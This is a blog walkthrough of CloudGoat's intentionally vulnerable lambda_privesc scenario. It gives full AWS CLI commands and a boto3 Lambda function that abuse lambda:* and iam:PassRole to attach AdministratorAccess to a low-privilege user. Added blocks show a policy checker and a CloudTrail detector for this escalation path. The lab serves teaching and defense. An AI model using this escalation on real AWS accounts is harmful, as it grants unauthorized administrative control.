[AWS-security] How to conduct Lambda privilege escalation

Takahiro Oda
5 min read · Dec 29, 2021


What we will do in this article

Conduct lambda privilege escalation attack using CloudGoat

You can see how to set up an initial environment here

Scenario: lambda_privesc

Summary

Starting as the IAM user Chris, the attacker discovers that they can assume a role that has full Lambda access and pass role permissions. The attacker can then perform privilege escalation to obtain full admin access.

Goal

Acquire full admin privileges.

Walkthrough

Step 1: deploy

We need to deploy the scenario on AWS with this command

./cloudgoat.py create lambda_privesc

You can see that the access and secret keys for Chris are provided.

I can see the new user in the console as well

Step 2: create a profile (Chris)

You can create a profile (Chris) using the access and secret keys from the previous step.

aws configure --profile Chris

Step 3: enumerate the policies

You can use AWS CLI commands to list the roles in the account and the policies attached to them.

The attacker realizes they are able to list and assume IAM roles. There are two interesting IAM roles: lambdaManager and debug.

aws iam list-roles --profile Chris | grep -E 'debug|lambdaManager'
aws iam list-attached-role-policies --role-name <role-name> --profile Chris

You can see that the debug role has the AdministratorAccess policy attached.

Step 4: review the details of the policy attached to Chris

Let's check the details of the policy attached to Chris.

aws iam get-policy --policy-arn arn:aws:iam::362364726861:policy/cg-lambdaManager-policy-cgidnt7ccq4w83 --profile Chris

So this is v1. Get the specific information about v1.

The attacker looks at the attached policies for the two IAM roles and realizes lambdaManager has full lambda access and pass role permissions and the debug role has full administrator privileges.

aws iam get-policy-version --policy-arn arn:aws:iam::362364726861:policy/cg-lambdaManager-policy-cgidnt7ccq4w83 --version-id v1 --profile Chris

So what we can see is full Lambda access and pass-role permissions:

1. lambda:*

2. iam:PassRole

So this means that the attacker can escalate privileges by passing an existing IAM role to a new Lambda function and running the code by invoking the function through the AWS API. This gives the user access to the privileges associated with any Lambda service role that exists in the account, which could range from no privilege escalation at all to full administrator access to the account.
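The combination the article has just found (lambda:* plus an unconditioned iam:PassRole on every resource) is something a defender can check for mechanically before an attacker does. The following is an added audit example, not code from the article or from CloudGoat: it scans an IAM policy document for the ability to write Lambda code together with an iam:PassRole that is neither pinned to specific roles nor limited to the Lambda service. WEAK_POLICY is a constructed document with the shape the article reports for the lambdaManager policy, and HARDENED_POLICY is a hypothetical least-privilege rewrite (a single named execution role, passed only to lambda.amazonaws.com); the account id, role names and function ARN prefix in both are placeholders.

```python
import json
from fnmatch import fnmatchcase

# Constructed policy documents used as input. WEAK_POLICY mirrors the shape
# the article reports for the lambdaManager policy (lambda:* plus iam:PassRole
# on every resource); HARDENED_POLICY is a hypothetical least-privilege
# rewrite. The account id, role names and function prefix are placeholders.
WEAK_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["lambda:*", "iam:PassRole"], "Resource": "*"}
    ],
}

HARDENED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": ["lambda:CreateFunction", "lambda:UpdateFunctionCode",
                       "lambda:InvokeFunction"],
            "Resource": "arn:aws:lambda:ap-northeast-1:111111111111:function:app-*",
        },
        {
            "Effect": "Allow",
            "Action": "iam:PassRole",
            # Only one named, low-privilege role may be passed, and only to Lambda.
            "Resource": "arn:aws:iam::111111111111:role/app-lambda-exec",
            "Condition": {"StringEquals": {"iam:PassedToService": "lambda.amazonaws.com"}},
        },
    ],
}

# Actions that let a principal put code of their choosing into a function.
LAMBDA_CODE_ACTIONS = (
    "lambda:CreateFunction",
    "lambda:UpdateFunctionCode",
    "lambda:UpdateFunctionConfiguration",
)


def _as_list(value):
    """IAM accepts either a string or a list in Statement/Action/Resource."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _matches(pattern, action):
    """IAM action matching is case-insensitive and supports '*' wildcards."""
    return fnmatchcase(action.lower(), pattern.lower())


def analyze_passrole_to_lambda(policy):
    """Return human-readable findings when a policy grants both the ability to
    create/modify Lambda code and an iam:PassRole that is not pinned down.
    Deny statements and NotAction are ignored in this simplified checker."""
    can_write_lambda = False
    passrole_statements = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        actions = _as_list(stmt.get("Action"))
        if any(_matches(p, a) for p in actions for a in LAMBDA_CODE_ACTIONS):
            can_write_lambda = True
        if any(_matches(p, "iam:PassRole") for p in actions):
            passrole_statements.append(stmt)

    findings = []
    if not (can_write_lambda and passrole_statements):
        return findings  # no path from PassRole into attacker-chosen Lambda code
    for stmt in passrole_statements:
        resources = _as_list(stmt.get("Resource"))
        if any(r == "*" or r.endswith("role/*") for r in resources):
            findings.append("iam:PassRole allowed on any role (Resource wildcard)")
        cond = stmt.get("Condition", {}).get("StringEquals", {})
        if "iam:PassedToService" not in cond:
            findings.append("iam:PassRole has no iam:PassedToService condition")
    return findings


if __name__ == "__main__":
    for name, doc in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(name, json.dumps(analyze_passrole_to_lambda(doc)))
```

Run against the document returned by the `aws iam get-policy-version` call above (the `Document` field of `PolicyVersion`), the weak policy produces two findings and the hardened one none. The checker only reports the PassRole side when the same policy can also write Lambda code, because PassRole on its own, without a way to run chosen code under the passed role, is not this escalation path.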

The attacker then tries to assume each role but realizes that they only have sufficient privileges to assume the lambdaManager role, and that the debug role can only be assumed by a Lambda function.

I try to assume the debug role, but access is denied because I lack the permission.

aws sts assume-role --role-arn <role-arn> --role-session-name <session-name> --profile Chris

But if I try to assume the lambda role, I can see the credentials.

aws sts assume-role --role-arn arn:aws:iam::362364726861:role/cg-lambdaManager-role-cgidnt7ccq4w83 --role-session-name test_lambda --profile Chris

The attacker now leverages the lambdaManager role to perform a privilege escalation using a Lambda function.

Step 5: create a Lambda function

Let's configure the IAM credentials in the AWS CLI first.

In order to include the session token, you need to edit this file. It might look like this.

vi ~/.aws/credentials

Let's create a Lambda function that will attach the admin policy to Chris.

vi lambda_function.py

The attacker writes a script that will attach the administrator policy to the IAM user "Chris".

The inside of the file looks like this. Be careful about indentation.

import boto3

def lambda_handler(event, context):
    # Runs under the function's execution role (the debug role), not under Chris.
    client = boto3.client('iam')
    response = client.attach_user_policy(
        UserName='chris-cgidnt7ccq4w83',
        PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
    )
    return response

Let's zip the file.

apk add zip
zip lamba_function.zip lambda_function.py

Using the lambdaManager role, the attacker creates a Lambda function, specifying the code, and sets the Lambda execution role to the debug role.

Run this command to create a Lambda function called admin. The handler value must be <file name>.<function name>, so for lambda_function.py above it is lambda_function.lambda_handler.

aws lambda create-function --function-name admin --runtime python3.6 --role arn:aws:iam::362364726861:role/cg-debug-role-cgidnt7ccq4w83 --handler lambda_function.lambda_handler --zip-file fileb://lamba_function.zip --profile LambdaManager --region ap-northeast-1

Step 6: invoke the function

Using the lambdaManager role, the attacker invokes the Lambda function, causing the administrator policy to be attached to the "Chris" user and thus gaining full admin access.

Run this command to invoke the function

aws lambda invoke --function-name admin output.txt --profile LambdaManager --region ap-northeast-1

Step 7: check the new policy attached to Chris

Run this command to check the new policy attached to Chris.

aws iam list-attached-user-policies --user-name chris-cgidnt7ccq4w83 --profile Chris

The AdministratorAccess policy now appears in the list of policies attached to Chris.
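Every call in steps 5 through 7 lands in CloudTrail, and the sequence has a distinctive shape: a CreateFunction whose execution role is a privileged role, followed within minutes by an IAM privilege change made by a session of that very role. The following is an added detection example, not code from the article or from CloudGoat: it correlates CreateFunction events with later IAM write calls whose sessionIssuer ARN equals the role that was passed to the function. SAMPLE_EVENTS are constructed CloudTrail records trimmed to the fields the logic reads; the account id, role names, session names and timestamps are placeholders and the window length is an assumption.

```python
from datetime import datetime, timedelta

# Constructed CloudTrail records, trimmed to the fields the detection reads.
# Account id, role names and timestamps are placeholders, not copied from any
# real trail. The sequence mirrors the article's steps: AssumeRole ->
# CreateFunction (execution role = debug) -> Invoke -> the function's own
# session attaches AdministratorAccess to the user.
ACCOUNT = "111111111111"
SAMPLE_EVENTS = [
    {
        "eventTime": "2021-12-29T10:00:00Z",
        "eventSource": "sts.amazonaws.com",
        "eventName": "AssumeRole",
        "userIdentity": {"type": "IAMUser", "userName": "chris"},
        "requestParameters": {"roleArn": f"arn:aws:iam::{ACCOUNT}:role/lambdaManager"},
    },
    {
        "eventTime": "2021-12-29T10:02:00Z",
        "eventSource": "lambda.amazonaws.com",
        "eventName": "CreateFunction20150331",
        "userIdentity": {
            "type": "AssumedRole",
            "sessionContext": {"sessionIssuer": {"arn": f"arn:aws:iam::{ACCOUNT}:role/lambdaManager"}},
        },
        "requestParameters": {"functionName": "admin", "role": f"arn:aws:iam::{ACCOUNT}:role/debug"},
    },
    {
        "eventTime": "2021-12-29T10:03:00Z",
        "eventSource": "lambda.amazonaws.com",
        "eventName": "Invoke",
        "userIdentity": {
            "type": "AssumedRole",
            "sessionContext": {"sessionIssuer": {"arn": f"arn:aws:iam::{ACCOUNT}:role/lambdaManager"}},
        },
        "requestParameters": {"functionName": "admin"},
    },
    {
        "eventTime": "2021-12-29T10:03:05Z",
        "eventSource": "iam.amazonaws.com",
        "eventName": "AttachUserPolicy",
        "userIdentity": {
            "type": "AssumedRole",
            "sessionContext": {"sessionIssuer": {"arn": f"arn:aws:iam::{ACCOUNT}:role/debug"}},
        },
        "requestParameters": {"userName": "chris", "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"},
    },
]

# IAM write calls that change who holds privilege. A Lambda execution role
# making one of these shortly after being handed to a new function is suspicious.
PRIVILEGE_CHANGING_IAM_EVENTS = {
    "AttachUserPolicy", "AttachRolePolicy", "AttachGroupPolicy",
    "PutUserPolicy", "PutRolePolicy", "CreateAccessKey", "CreateLoginProfile",
    "UpdateAssumeRolePolicy",
}
WINDOW = timedelta(minutes=30)  # assumed correlation window


def _when(event):
    return datetime.strptime(event["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def _session_issuer(event):
    """ARN of the role that issued the caller's session, if the caller was a role."""
    return (event.get("userIdentity", {})
                 .get("sessionContext", {})
                 .get("sessionIssuer", {})
                 .get("arn"))


def detect_passrole_lambda_escalation(events):
    """Correlate each CreateFunction with later IAM privilege changes made by a
    session of the very role that was passed as the function's execution role.
    Returns a list of alert dicts (empty when nothing matches)."""
    events = sorted(events, key=_when)
    alerts = []
    for created in events:
        if (created["eventSource"] != "lambda.amazonaws.com"
                or not created["eventName"].startswith("CreateFunction")):
            continue
        passed_role = created["requestParameters"].get("role")
        deadline = _when(created) + WINDOW
        for later in events:
            if later["eventSource"] != "iam.amazonaws.com":
                continue
            if later["eventName"] not in PRIVILEGE_CHANGING_IAM_EVENTS:
                continue
            if not (_when(created) <= _when(later) <= deadline):
                continue
            if _session_issuer(later) != passed_role:
                continue
            params = later["requestParameters"]
            alerts.append({
                "function": created["requestParameters"].get("functionName"),
                "created_by": _session_issuer(created),
                "execution_role": passed_role,
                "iam_event": later["eventName"],
                "target": params.get("userName") or params.get("roleName"),
                "policy_arn": params.get("policyArn"),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_passrole_lambda_escalation(SAMPLE_EVENTS):
        print(alert)
```

The key join is on sessionIssuer: when a function runs, its API calls are logged under an assumed-role session issued by the execution role, so the role ARN given to CreateFunction reappears verbatim in the later IAM event. Correlating on that field rather than on the invoking user is what ties the AttachUserPolicy back to the person who created the function, since the invoker (lambdaManager) never appears on the IAM call itself.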

Step 8: cleanup

Run this command to destroy the resources that are used in this article.

./cloudgoat.py destroy lambda_privesc
Type 'y' to confirm.

After destroying, we don’t see Chris anymore.
